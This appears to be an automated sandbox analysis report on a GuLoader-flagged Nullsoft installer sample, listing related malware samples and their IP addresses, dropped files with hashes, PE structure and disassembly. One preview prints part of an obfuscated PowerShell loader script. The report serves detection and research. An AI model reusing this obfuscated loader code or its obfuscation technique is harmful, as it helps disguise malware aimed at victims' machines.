                                                                                            p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                            • 119.18.54.27
                                                                                            copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.91.199.224
                                                                                            1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 199.79.62.115
                                                                                            Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 199.79.62.115
                                                                                            TT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 199.79.62.115
                                                                                            24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 199.79.62.115
                                                                                            HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                            • 208.91.199.22
                                                                                            H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                                                            • 103.53.40.62
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 104.26.13.205
                                                                                            D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.13.205
                                                                                            http://www.axa-assistance.co.ukGet hashmaliciousUnknownBrowse
                                                                                            • 104.26.13.205
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 104.26.13.205
                                                                                            https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.26.13.205
                                                                                            QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.26.13.205
                                                                                            5jh97SOa7H.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.26.13.205
                                                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 104.26.13.205
                                                                                            RFQABCO004806L____________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.26.13.205
                                                                                            b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 104.26.13.205
                                                                                            37f463bf4616ecd445d4a1937da06e19kzTEwlPWa0.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            LqtjSIsoCg.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            5jh97SOa7H.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            ImDbHt7AA4.exeGet hashmaliciousDarkCloudBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 142.250.185.238
                                                                                            • 216.58.206.65
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):49
                                                                                            Entropy (8bit):4.070004038570087
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:QAXVaPRJI0bvy:HXVaP7O
                                                                                            MD5:76A839ED464E25ED3A060D4A41772277
                                                                                            SHA1:3E9AA586550E5AA9CD13CD8BB9E2C299A3AB9BA8
                                                                                            SHA-256:B851E8E5C058CC715190866A595D11A0BDF51898244B76E959653F90992FEE05
                                                                                            SHA-512:434F9C698E05AA687A063EEA2A96F761D8A3ECC344FD70AF70502F719027AD7FAE9CB59F35F53B86257A6368294A53150733C0A4447F179094D1B5F6AF44A50C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:[Kringlerne205]..garderobenumrene=uvornhedernes..
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):14744
                                                                                            Entropy (8bit):4.992175361088568
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                            MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                            SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                            SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                            SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):417075
                                                                                            Entropy (8bit):7.6324805562500355
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:01e/w7akeM0NHWIIRvVbA2oIWe44KDoIH442Tk8CHn1KfC6011iJcd:01e/zM0N2II1V/go2435CVKfYEJs
                                                                                            MD5:B2241C3B5C876473B1C5B574E57545B7
                                                                                            SHA1:A202A0F035BA6407A406E63C8502F3A6EF32AB78
                                                                                            SHA-256:0AB3AC15E965390BE40F2618602680854CA7C99B61F21B19A7E9796A701D458E
                                                                                            SHA-512:CA339FF586068B26AA6DECAC6D42EE2DE95D92F5D3FA0270A3CD5268D5A4AE6424C9F3C8E81A76243E87F20C91D4271E927597BE2B7B60BEEE6E29827C3985CE
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Preview:.............4444.]]]]].........u.........aa.s.````......y....................]].......MMM...............8..............9..9.111.................f..888..........ggg......G........NN....####....p.#.....).3.RRR.##...........8......GG......HH........C..............}..GG.......................WWWW........J.OO................................~~~.....................RR....-.........I..cc...&...........5..........##...............))...)...5..........##.OO.b.....M..................6.........u."......mm.......................dd.........KK.DD.................u...........8.???....t./..\..^^...........WW.9..3.h..E......FF............((.q....ee..........o.^..ff....l.......gg..............''..........jjj...........:..\\\..........................ii..i.....z.......................''.............................................................................'''.......QQ.??.........0.....rr.......P.....S...............i......c..OO...n.d..<<.H....$$.LL.......m......w................K....'......++....@..
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:ASCII text, with very long lines (4183), with CRLF, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):72126
                                                                                            Entropy (8bit):5.177876289108867
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:fZry9pJQSDE2QOSN6kSWlseqwXMCui4eF5BaLC8AGfXiNNRVNwtt:fZry9pJXVdSA2GSbF5BaLUoiDlwz
                                                                                            MD5:2C18E32DB9C92D5D34BA98C74D359E41
                                                                                            SHA1:1E595B40523CBD6D8AF52C7D216B8B68D8D95475
                                                                                            SHA-256:6B74258103AC12452F38860864903D37ACCB0567AE7A7532D49CEAB524797775
                                                                                            SHA-512:ED83C9CD8F23030905932CE921924579F2A45EAF3F8EB1E1F8CE82A6075B7909F6228738AD9EB3E0576DE9A03302D0B39AF16B6061DE0CCA10646F8050F70AD0
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview:$Frolicsomely=$Easily;..<#Demobilisationerne callisection Unkilling Deglazed arbejdsfrie #>..<#Vulg Svanesang sitdownstrejken #>..<#honnr koordinatsts Fingereredes #>..<#Goldenrod Chondrilla Pukkelokse Pursual Sanities #>..<#flammes Thromboclasis Credoer Economic klostertorv Fordampede #>..<#Hooka sproutage Unantique Venstrevendt Fjeldskreddets Elementalistically #>...$Regainable = @'.Produce.Noninte$Niogty SantibiokZooma cvValutaljKritrime,alvrimtCurioss=dishwat$ owncurTRefugieaTrenservHippopheGgendesr Sal adn TrispaiGuldgraslangemaeForlang;Glamhul.Sta ttifBleachauPerforen ChimolcSminkebt FastsaiOmfa nioDway.einElectro FalsetJServi eeHariolarStaldfieUnabbrem SorensiMerceria .essounSkolarei FacadecSlagels Skrmst(.aaretv$Brandisr VillaeeIntereskAfsendtn FagottoTvrretntFloskle,Asphyxy$.imenhjPGrowlierScriptoobenzosugDi tribrtub lifa P riegmFoliantrsid.evoeTrilliod ScamanaStatuarkDrengebtBaandspr,kkolodeAristokr.ulekaknDiscoune Lymf t)Uforsta Chuddar{Trichog. klikes. Produk$AfbenerRTran
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:ASCII text, with very long lines (413), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):415
                                                                                            Entropy (8bit):4.261366184084369
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:bMIsP3NUXNzOITZ80LQBkN68gdX3XTKXIj2hEJtiN6MwALUGKtpyWggLuZE9yjFz:bG3NUXR60AiXIyhEXfSKtMgLkfOgVU0
                                                                                            MD5:23F21C95462F380DCCA7396E44AF4F66
                                                                                            SHA1:F0A92E02E38F5FAC118BFAE8799850F269901444
                                                                                            SHA-256:C485EFD3DA91587D473D6F94728417C920FF7809A364895CF9B94E6B459A8486
                                                                                            SHA-512:AA700B8D7CBBE7A214B06A6F4E114F2AC71BFE461EF66643C59BBC6433E144C0286C3242F34952DF294ECF527B2DB147CFC3ADDDCD36A2BF40C3CF4B7DC50B07
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:slappy boltage cardipaludism aksets fiskenettene phyllitis,succeslse tidology chivies.maskinvrkstederne tarns underdepth abb guesten azoxime.rhizopods loppers dilettanteriet anisotrop.decistere toilettaskernes intercombination implicerede myrmotherine enthelmintha cementeringers,serpette aasmunds strikketj oxidisability inkurabel tirsdagsmde trillian counteractingly udstraalende overriding bhlam genfortllingen..
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):181294
                                                                                            Entropy (8bit):4.932171597791879
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:PWZ38TcdyEiAIdL+6atb4M20dN4Olv/AP26TgjJjvqzH2fsewaih2w7QC2FTofK:OBicILFatb4MjCOlnAP26TgVoTaq7Sv
                                                                                            MD5:D09648CA5E7B8C5B5B2DDA3BCDBBA069
                                                                                            SHA1:6E060FE35373D3117A50241282EBC657D7DCA827
                                                                                            SHA-256:976E36495A1120100BEF38A54E3F84CF2528C6203815EEAFC8520C39A37769C9
                                                                                            SHA-512:0BCDA61608BD7E2B024A94AD6EA4EB229D1FB794EDE7D462C96AD2516B4E4DFF473BE9D68E5DE6548C8910CA5BC8C7E9E069D4E03107CF3BEC1DF4726633D738
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:......f...6.........8.....aJ.........u..D....!.~..........^..'.............{.g...........jp.....w.........Y./...!........|..+.d...u.....R............$.........<.................W.....tg.......V..h.O}.....~.96OU..v....ig......<.1VN..2.................Rc.H^..2........:.........@...P.~.._..../.......l..t.............. ............T..k.....C3.....V.....................]..........,..S.............._.........I.....V.../..-..A2.....s.%........0.......k..%.C........u.V......0.........J.....4...(..YW>.r.k......a.#...$.....y.......2...."%@.....C.......1...P.T.N..p..........d.....G.X>.:.v...#..E.R..M..Y..B.........r.Y..|w........{..]..........t. ...g...5..C........{........}.3.$.w.....m...>...u.....v............g..............+z.E...w1..j.....>{..Dq.......~....^........;....VG.......n%...d...........C......u.X.......G.t..................P......{m.;..........................y.o%.........S.f.................3.............U. ........Q...."....Ix.....}...T.h...........J;.X...1...q?.....x....
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):104710
                                                                                            Entropy (8bit):4.932457638938974
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:bXX7bC5jLbV00e03fKpx6WAnmy4Pr18ujKSBUOug0EnxknlK3NEW:jHabi0ecrnor1VKSBUOd9kyv
                                                                                            MD5:8B6CD2A99F8B800B6F469C2D725644C8
                                                                                            SHA1:A507E4060289046B557AE00FB04ECC948B86CE82
                                                                                            SHA-256:0E08CEBBD1CAD17EE182DA2C0ACCB694AABD56A5E9228D07F603D4BAF14B721C
                                                                                            SHA-512:8023083A3AF39F73CE2371F2C84904AD5D9CD4054ACFC9328C734D8C8D10A6ABE6B800D26410361525E45C0848B66C3A72D9577A03B3F3C02626F9AD091FEAC7
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:s..1..........+^......[...53....................6..+.....9....../...[...i..C.......M.p.........?...W..m......m(..................q..........{2T;..z.G.....%......6....2..............+'............R.....k.....XS.Z........^G........A....(.......H...q.r>..S...............X......\..{.....m.`8....".......R6...'..x.....*....#........._7...>.........../........."X........?d...........B...J.... ..........6...e..n...|...5H.............`..#..>n.$.....<.......w...m.l.........+.........%....U..........2..K.J....%..{........:..........^...?p............*8.},....j..............y........f..............Q>`/._.,.....8........*...OR.........................r&.n.sL...#..}.....G.............G...x9.....-.................g............F.........S...~............~..q............i..9.........D/-......q.-B.{.........,....q..............R..);.R........k.....A.k.............9n.Z.......5......b.E...r..U..C.............T........................c.....&I.....6..S.....x.M........-.&..........|L...0...9.......
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):499165
                                                                                            Entropy (8bit):4.93597084407956
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:Xb0ND3GZTlGsTzIqdIOSWKkizBGO3wDkYeymEJisTKA+NRh:XodOl/zHqOSWvyFwiyRJiaH+NP
                                                                                            MD5:CAEBDA34E18DC7AC30573336EDAB663C
                                                                                            SHA1:6F53BAA47681CE7C21482E4963D85D81828D2B89
                                                                                            SHA-256:051A550A03AF7177702820CED314693CE798DE1E0D7E501E432C0DE814D660E9
                                                                                            SHA-512:0B5D6701E2EA727C47B5389994E1AF32B3999409C4FAF8B783776A7C183CF93841439714364B189A1DB246FEF5FAEC7D26585D88AD02530C836EE9B10620C0E8
                                                                                            Malicious:false
                                                                                            Preview:>(O......2.......*7.. [.T...F.....h.....`............h.*.....1......7.....L..8e._.....................^..6..?D.[.%4.....................O.......V..*.I."............y............*...k.... .....p....X...g.................7...y......q.......]9.....H...t)....E............v..>..R..................iM....+.N.........|.....4..|...Y......O.......9.'.....1._.......6..5..v...6C.a.n.....i..e.....l.....J..)...".uM...).m.p..........S.,..p............s.....6.............&..g.......f..6...1a....................[....K.>.....c..............v..`.....j......f&...........T..0.k...8.....1...O7........K".G.......H.|........:..v..n...%.@t...l...B.....y..........q......C.u...~....W...o...O........\....wH...J<S....!.........M.....$*~..&....|.....a/..G..............`...........%...:.w%.h......5.......P/l..'...`...........l.....s..............F.5...Y.............]..........m.t......G..I...._........b..O.~+.p.....9...............s.9....................q...j......kP........}......Z...}............&...Y
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\Desktop\REnBTVfW8q.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1283117
                                                                                            Entropy (8bit):6.149666434053259
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:jZ2kCEkwcIB4il7PPO6odOl/zHqOSWvyFwiyRJiaH+NP:d2kCEkwFC6ocLFdq+q
                                                                                            MD5:343E56585C8AD4B0F3D012A734A5DABF
                                                                                            SHA1:67A032D92B29A782E06996A891D814AED9D58E0F
                                                                                            SHA-256:26B4F5FEFA2F11A33E5E8896A1BC192C048146B541E92925385F0759C299C249
                                                                                            SHA-512:8CE2C8D6BFB1FEEAB8B20B698C532155E606627D727096ACA029F1BEAEC2BBED49E5CCCBCDE2B26FA200A87EF541FBCBD8C0A531EEC4272F3A9A4CDC88014EBA
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsc2139.tmp, Author: Joe Security
                                                                                            Preview:p ......,...................[...................p ..........................................................................................................................................................................................................................................G...W...............j...........................................................................................................................................%...5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.830149799061535
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:REnBTVfW8q.exe
                                                                                            File size:1'157'372 bytes
                                                                                            MD5:e6a0bb6bcaf44fbcc341ef4c93482059
                                                                                            SHA1:c624142c98aef78d3a0434cf308f42750315b4bb
                                                                                            SHA256:5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943
                                                                                            SHA512:2c5c1e2585177207fcd192d6a26efe674bced3092768b8ab16dd78ff744cfbab4e47e8a08825ed5a82c0163c2933e5f411f41ae7e5492398a3b051021bef50ad
                                                                                            SSDEEP:24576:8tOXYTDOxnFCCth1KjcaeGP8IV81WvrWp3p+GYE:8AXIqxnFCCtHKjq443p1YE
                                                                                            TLSH:B83512527E2CE5E7FA3C32B22857C65A3FB4786A0B81575B75EAB21368013074E0F95C
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                                                            Icon Hash:39a7a765765e5937
                                                                                            Entrypoint:0x403489
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            pop edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [esp+14h], ebx
                                                                                            mov dword ptr [esp+10h], 0040A230h
                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                            call dword ptr [004080ACh]
                                                                                            call dword ptr [004080A8h]
                                                                                            and eax, BFFFFFFFh
                                                                                            cmp ax, 00000006h
                                                                                            mov dword ptr [0042A24Ch], eax
                                                                                            je 00007F8B086FC8F3h
                                                                                            push ebx
                                                                                            call 00007F8B086FFBA1h
                                                                                            cmp eax, ebx
                                                                                            je 00007F8B086FC8E9h
                                                                                            push 00000C00h
                                                                                            call eax
                                                                                            mov esi, 004082B0h
                                                                                            push esi
                                                                                            call 00007F8B086FFB1Bh
                                                                                            push esi
                                                                                            call dword ptr [00408150h]
                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                            cmp byte ptr [esi], 00000000h
                                                                                            jne 00007F8B086FC8CCh
                                                                                            push 0000000Ah
                                                                                            call 00007F8B086FFB74h
                                                                                            push 00000008h
                                                                                            call 00007F8B086FFB6Dh
                                                                                            push 00000006h
                                                                                            mov dword ptr [0042A244h], eax
                                                                                            call 00007F8B086FFB61h
                                                                                            cmp eax, ebx
                                                                                            je 00007F8B086FC8F1h
                                                                                            push 0000001Eh
                                                                                            call eax
                                                                                            test eax, eax
                                                                                            je 00007F8B086FC8E9h
                                                                                            or byte ptr [0042A24Fh], 00000040h
                                                                                            push ebp
                                                                                            call dword ptr [00408044h]
                                                                                            push ebx
                                                                                            call dword ptr [004082A0h]
                                                                                            mov dword ptr [0042A318h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+34h]
                                                                                            push 000002B4h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 004216E8h
                                                                                            call dword ptr [00408188h]
                                                                                            push 0040A384h
                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x37a50.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x63d10x6400139645791b76bd6f7b8c4472edbbdfe5False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x80000x138e0x1400007eff248f0493620a3fd3f7cadc755bFalse0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xa0000x203580x600ec5bcec782f43a3fb7e8dfbe0d0db4dbFalse0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x2b0000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x4d0000x37a500x37c000a9549e2f266cd4b3a5efbeb1cd42a37False0.5249614630044843data6.504249010396493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x4d3400x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.3221334586466165
                                                                                            RT_ICON0x5dd400xee00PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9737066701680672
                                                                                            RT_ICON0x6cb400x9600Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.35966145833333335
                                                                                            RT_ICON0x761400x5600Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.39821039244186046
                                                                                            RT_ICON0x7b7400x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.41515395220588236
                                                                                            RT_ICON0x7fb400x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.46895559210526316
                                                                                            RT_ICON0x821400x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.5325520833333334
                                                                                            RT_ICON0x833400xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.611328125
